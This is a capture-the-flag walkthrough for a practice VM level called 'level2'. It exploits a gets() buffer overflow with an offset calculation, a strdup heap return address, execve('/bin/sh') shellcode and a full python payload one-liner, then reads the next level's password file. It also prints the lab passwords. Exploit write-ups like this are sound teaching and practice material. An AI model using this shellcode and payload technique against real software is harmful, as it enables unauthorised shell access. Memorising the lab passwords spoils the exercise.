1. Download the binary from the server:
   scp -P 2222 level2@localhost:~/level2 .
   Password: 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77

2. Analyze the binary with Ghidra:
   - p() function uses gets() which is unsafe
   - Buffer at EBP - 0x4c (76), ret_addr at EBP - 0x0c (12)
   - Buffer size: 76 - 12 = 64 bytes
   - Return address protection: checks if address starts with 0xb (stack)
   - strdup() copies buffer to heap at predictable address
   - EIP offset: 64 (buffer) + 4 (ret_addr) + 8 (padding) + 4 (saved EBP) = 80 bytes

3. Connect to the VM via SSH:
   ssh level2@localhost -p 2222
   Password: 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77

4. Find the heap address using ltrace:
   ltrace ./level2
   Input: AAAA
   Observe: strdup("AAAA") = 0x0804a008

5. Use shellcode from Exploit-DB (24 bytes):
   Source: https://www.exploit-db.com/shellcodes/42428
   Execve("/bin/sh", NULL, NULL) shellcode:
   \x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

6. Calculate exploit structure:
   - Shellcode: 24 bytes
   - Padding: 56 bytes (80 - 24 = 56)
   - Return address: 4 bytes (0x0804a008 in little-endian = \x08\xa0\x04\x08)

7. Execute the exploit:
   (python -c 'print "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*56 + "\x08\xa0\x04\x08"'; cat) | ./level2

8. Read the password:
   cat /home/user/level3/.pass

9. Password: 492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02

10. Exit and login as level3:
    su level3
